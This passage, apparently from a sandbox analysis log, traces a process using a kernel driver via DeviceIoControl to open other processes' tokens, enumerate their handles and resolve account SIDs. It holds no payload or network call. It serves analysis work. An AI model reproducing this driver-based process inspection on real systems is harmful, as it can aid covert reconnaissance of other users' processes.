PsReleaseProcessExitSynchronization () returned 0x2 [0291.687] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff6c [0291.687] IoCompleteRequest () returned 0x0 [0291.689] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.689] PsAcquireProcessExitSynchronization () returned 0x0 [0291.689] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.689] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a73b5d0, HandleInformation=0x0) returned 0x0 [0291.689] ObfDereferenceObject (Object=0xffffe0006a73b5d0) returned 0x8000 [0291.689] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.689] PsReleaseProcessExitSynchronization () returned 0x2 [0291.689] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff6b [0291.689] IoCompleteRequest () returned 0x0 [0291.689] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.689] PsAcquireProcessExitSynchronization () returned 0x0 [0291.689] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.689] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0291.689] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.689] PsReleaseProcessExitSynchronization () returned 0x2 [0291.689] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff6a [0291.689] IoCompleteRequest () returned 0x0 [0291.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0x188 [0291.690] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.690] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a2fb080, HandleInformation=0x0) returned 0x0 [0291.690] ObOpenObjectByPointer (in: Object=0xffffe0006a2fb080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.690] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x28012 [0291.690] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.690] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.690] IoCompleteRequest () returned 0x0 [0291.690] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.690] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.690] CloseHandle (hObject=0x18c) returned 1 [0291.690] CloseHandle (hObject=0x188) returned 1 [0291.691] PsLookupProcessByProcessId (in: ProcessId=0x7d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.691] PsAcquireProcessExitSynchronization () returned 0x0 [0291.691] KeStackAttachProcess (in: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400) [0291.691] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069057390, HandleInformation=0x0) returned 0x0 [0291.691] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.691] PsReleaseProcessExitSynchronization () returned 0x2 [0291.691] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x20010 [0291.691] ObQueryNameString (in: Object=0xffffe00069057390, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.691] ObfDereferenceObject (Object=0xffffe00069057390) returned 0x7f6a [0291.691] IoCompleteRequest () returned 0x0 [0291.691] PsLookupProcessByProcessId (in: ProcessId=0x7d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.691] PsAcquireProcessExitSynchronization () returned 0x0 [0291.691] KeStackAttachProcess (in: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400) [0291.691] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f52980, HandleInformation=0x0) returned 0x0 [0291.691] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.691] PsReleaseProcessExitSynchronization () returned 0x2 [0291.691] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x2000f [0291.691] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.691] ObfDereferenceObject (Object=0xffffe00069f52980) returned 0x7ffe [0291.691] IoCompleteRequest () returned 0x0 [0291.691] PsLookupProcessByProcessId (in: ProcessId=0x7d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.691] PsAcquireProcessExitSynchronization () returned 0x0 [0291.691] KeStackAttachProcess (in: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400) [0291.691] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007bf755f0, HandleInformation=0x0) returned 0x0 [0291.691] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.691] PsReleaseProcessExitSynchronization () returned 0x2 [0291.691] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x2000e [0291.691] ObQueryNameString (in: Object=0xffffe0007bf755f0, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.691] ObfDereferenceObject (Object=0xffffe0007bf755f0) returned 0x7ffe [0291.691] IoCompleteRequest () returned 0x0 [0291.691] PsLookupProcessByProcessId (in: ProcessId=0x7d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.691] PsAcquireProcessExitSynchronization () returned 0x0 [0291.691] KeStackAttachProcess (in: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400) [0291.691] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c3250, HandleInformation=0x0) returned 0x0 [0291.691] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.691] PsReleaseProcessExitSynchronization () returned 0x2 [0291.691] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x2000d [0291.691] ObQueryNameString (in: Object=0xffffe0006a4c3250, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.691] ObfDereferenceObject (Object=0xffffe0006a4c3250) returned 0x7ffe [0291.691] IoCompleteRequest () returned 0x0 [0291.691] PsLookupProcessByProcessId (in: ProcessId=0x7d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.691] PsAcquireProcessExitSynchronization () returned 0x0 [0291.691] KeStackAttachProcess (in: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400) [0291.691] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006911f910, HandleInformation=0x0) returned 0x0 [0291.692] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.692] PsReleaseProcessExitSynchronization () returned 0x2 [0291.692] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x2000c [0291.692] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.692] ObfDereferenceObject (Object=0xffffe0006911f910) returned 0x7fff [0291.692] IoCompleteRequest () returned 0x0 [0291.692] PsLookupProcessByProcessId (in: ProcessId=0x7d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.692] PsAcquireProcessExitSynchronization () returned 0x0 [0291.692] KeStackAttachProcess (in: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a2fb080, ApcState=0xffffd000ac0cf400) [0291.692] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690fb670, HandleInformation=0x0) returned 0x0 [0291.692] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.692] PsReleaseProcessExitSynchronization () returned 0x2 [0291.692] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x2000b [0291.692] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.692] ObfDereferenceObject (Object=0xffffe000690fb670) returned 0x7ffe [0291.692] IoCompleteRequest () returned 0x0 [0291.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x188 [0291.692] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.692] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00068a50840, HandleInformation=0x0) returned 0x0 [0291.692] ObOpenObjectByPointer (in: Object=0xffffe00068a50840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.692] ObfDereferenceObject (Object=0xffffe00068a50840) returned 0x38007 [0291.692] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.692] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.692] IoCompleteRequest () returned 0x0 [0291.692] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.692] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.693] CloseHandle (hObject=0x18c) returned 1 [0291.693] CloseHandle (hObject=0x188) returned 1 [0291.693] PsLookupProcessByProcessId (in: ProcessId=0x458, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.693] PsAcquireProcessExitSynchronization () returned 0x0 [0291.693] KeStackAttachProcess (in: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400) [0291.693] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a336450, HandleInformation=0x0) returned 0x0 [0291.693] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.693] PsReleaseProcessExitSynchronization () returned 0x2 [0291.693] ObfDereferenceObject (Object=0xffffe00068a50840) returned 0x30005 [0291.693] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.693] ObfDereferenceObject (Object=0xffffe0006a336450) returned 0x7ffe [0291.693] IoCompleteRequest () returned 0x0 [0291.693] PsLookupProcessByProcessId (in: ProcessId=0x458, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.693] PsAcquireProcessExitSynchronization () returned 0x0 [0291.693] KeStackAttachProcess (in: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400) [0291.693] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069eed250, HandleInformation=0x0) returned 0x0 [0291.693] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.694] PsReleaseProcessExitSynchronization () returned 0x2 [0291.694] ObfDereferenceObject (Object=0xffffe00068a50840) returned 0x30004 [0291.694] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.694] ObfDereferenceObject (Object=0xffffe00069eed250) returned 0x7ffe [0291.694] IoCompleteRequest () returned 0x0 [0291.694] PsLookupProcessByProcessId (in: ProcessId=0x458, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.694] PsAcquireProcessExitSynchronization () returned 0x0 [0291.694] KeStackAttachProcess (in: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400) [0291.694] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a47cb70, HandleInformation=0x0) returned 0x0 [0291.694] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.694] PsReleaseProcessExitSynchronization () returned 0x2 [0291.694] ObfDereferenceObject (Object=0xffffe00068a50840) returned 0x30003 [0291.694] ObQueryNameString (in: Object=0xffffe0006a47cb70, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.694] ObfDereferenceObject (Object=0xffffe0006a47cb70) returned 0x7ffe [0291.694] IoCompleteRequest () returned 0x0 [0291.694] PsLookupProcessByProcessId (in: ProcessId=0x458, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.694] PsAcquireProcessExitSynchronization () returned 0x0 [0291.694] KeStackAttachProcess (in: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a50840, ApcState=0xffffd000ac0cf400) [0291.694] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a64f430, HandleInformation=0x0) returned 0x0 [0291.694] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.694] PsReleaseProcessExitSynchronization () returned 0x2 [0291.694] ObfDereferenceObject (Object=0xffffe00068a50840) returned 0x30002 [0291.694] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a7c6044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7c6044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.694] ObfDereferenceObject (Object=0xffffe0006a64f430) returned 0x7ffb [0291.694] IoCompleteRequest () returned 0x0 [0291.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf74) returned 0x0 [0291.694] PsLookupProcessByProcessId (in: ProcessId=0xf74, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.694] PsAcquireProcessExitSynchronization () returned 0x0 [0291.694] KeStackAttachProcess (in: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400) [0291.694] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a766f20, HandleInformation=0x0) returned 0x0 [0291.694] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.694] PsReleaseProcessExitSynchronization () returned 0x2 [0291.694] ObfDereferenceObject (Object=0xffffe0006a892080) returned 0x28007 [0291.694] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a606044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a606044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.694] ObfDereferenceObject (Object=0xffffe0006a766f20) returned 0x7ffe [0291.694] IoCompleteRequest () returned 0x0 [0291.694] PsLookupProcessByProcessId (in: ProcessId=0xf74, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.694] PsAcquireProcessExitSynchronization () returned 0x0 [0291.694] KeStackAttachProcess (in: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400) [0291.694] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6ed600, HandleInformation=0x0) returned 0x0 [0291.694] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.694] PsReleaseProcessExitSynchronization () returned 0x2 [0291.694] ObfDereferenceObject (Object=0xffffe0006a892080) returned 0x28006 [0291.695] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.695] ObfDereferenceObject (Object=0xffffe0006a6ed600) returned 0x7ffe [0291.695] IoCompleteRequest () returned 0x0 [0291.695] PsLookupProcessByProcessId (in: ProcessId=0xf74, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.695] PsAcquireProcessExitSynchronization () returned 0x0 [0291.695] KeStackAttachProcess (in: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400) [0291.695] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a6ada0, HandleInformation=0x0) returned 0x0 [0291.695] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.695] PsReleaseProcessExitSynchronization () returned 0x2 [0291.695] ObfDereferenceObject (Object=0xffffe0006a892080) returned 0x28005 [0291.695] ObQueryNameString (in: Object=0xffffe00069a6ada0, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.695] ObfDereferenceObject (Object=0xffffe00069a6ada0) returned 0x7ffe [0291.695] IoCompleteRequest () returned 0x0 [0291.695] PsLookupProcessByProcessId (in: ProcessId=0xf74, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.695] PsAcquireProcessExitSynchronization () returned 0x0 [0291.695] KeStackAttachProcess (in: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a892080, ApcState=0xffffd000ac0cf400) [0291.695] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069820870, HandleInformation=0x0) returned 0x0 [0291.695] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.695] PsReleaseProcessExitSynchronization () returned 0x2 [0291.695] ObfDereferenceObject (Object=0xffffe0006a892080) returned 0x28004 [0291.695] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.695] ObfDereferenceObject (Object=0xffffe00069820870) returned 0x7ffe [0291.695] IoCompleteRequest () returned 0x0 [0291.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfa4) returned 0x188 [0291.695] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.695] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069e17400, HandleInformation=0x0) returned 0x0 [0291.695] ObOpenObjectByPointer (in: Object=0xffffe00069e17400, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.695] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x27fe5 [0291.695] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.695] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.695] IoCompleteRequest () returned 0x0 [0291.695] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.695] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.696] CloseHandle (hObject=0x18c) returned 1 [0291.696] CloseHandle (hObject=0x188) returned 1 [0291.696] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.696] PsAcquireProcessExitSynchronization () returned 0x0 [0291.696] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.696] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a80cf20, HandleInformation=0x0) returned 0x0 [0291.697] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.697] PsReleaseProcessExitSynchronization () returned 0x2 [0291.697] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffe3 [0291.697] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.697] ObfDereferenceObject (Object=0xffffe0006a80cf20) returned 0x7ffe [0291.697] IoCompleteRequest () returned 0x0 [0291.697] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.697] PsAcquireProcessExitSynchronization () returned 0x0 [0291.697] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.697] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6828a0, HandleInformation=0x0) returned 0x0 [0291.697] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.697] PsReleaseProcessExitSynchronization () returned 0x2 [0291.697] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffe2 [0291.697] ObQueryNameString (in: Object=0xffffe00069086c90, 